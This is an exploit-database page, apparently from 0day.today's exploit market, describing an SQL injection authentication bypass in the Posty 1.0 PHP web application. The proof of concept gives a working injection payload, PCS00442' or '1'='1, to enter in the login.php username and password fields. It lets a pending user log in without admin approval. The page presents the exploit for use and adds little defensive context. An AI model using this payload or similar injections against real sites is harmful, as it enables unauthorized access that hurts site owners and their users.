[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Posty 1.0 SQL Injection Vulnerability

Author
Ali BawazeEer
Risk
[
Security Risk High
]
0day-ID
0day-ID-28398
Category
web applications
Date add
30-08-2017
Platform
php
<!-- 
# Exploit Title: Posty - SQL injection Authentication bypass 
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 27.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.posty.in
# Version: 1.0
# Category: Webapps
# Tested on: windows 7 / mozila firefox 
# 
#
--!>

# ========================================================
#
#
# Posty SQL injection Authentication bypass 
# 
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as normal user 
# 
# Proof of Concept : - 
# 
# http://localhost/login.php  [ set username and password ] = PCS00442' or '1'='1
#   where PCS00442 is the user ID waiting for admin approval 
# 
# 
#
# Risk : authenticated attacker maybe starting posting item in the site without administrator approvel for his / her account 
#

#  0day.today [2024-11-15]  #